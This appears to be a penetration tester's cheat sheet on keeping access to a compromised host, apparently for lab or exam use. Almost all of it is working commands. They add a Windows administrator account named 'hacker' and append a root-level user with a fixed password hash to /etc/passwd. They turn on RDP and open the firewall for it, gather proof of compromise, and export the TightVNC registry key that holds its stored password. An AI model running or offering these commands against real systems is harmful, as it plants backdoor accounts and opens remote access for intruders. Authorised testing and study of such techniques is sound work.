Notes - Maintain Access
Create new user
# windows
> net user hacker pass123 /add && net localgroup administrators hacker /add
# linux
# Generate password hash
> openssl passwd -1 -salt hacker pass123
# Add to /etc/passwd
> echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash' >> /etc/passwd
# If running a script
> echo 'echo "hacker:\$1\$hacker\$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash" >> /etc/passwd' > script.sh
Enable rdp
# powershell
> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
# cmd
> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Proof
- Collect proof of compromised
> hostname && id && cat proof.txt && ip a
> hostname && whoami && type proof.txt && ipconfig /all
TightVNC Reg
reg export “HKLM\Software\TightVNC\Server” foo.reg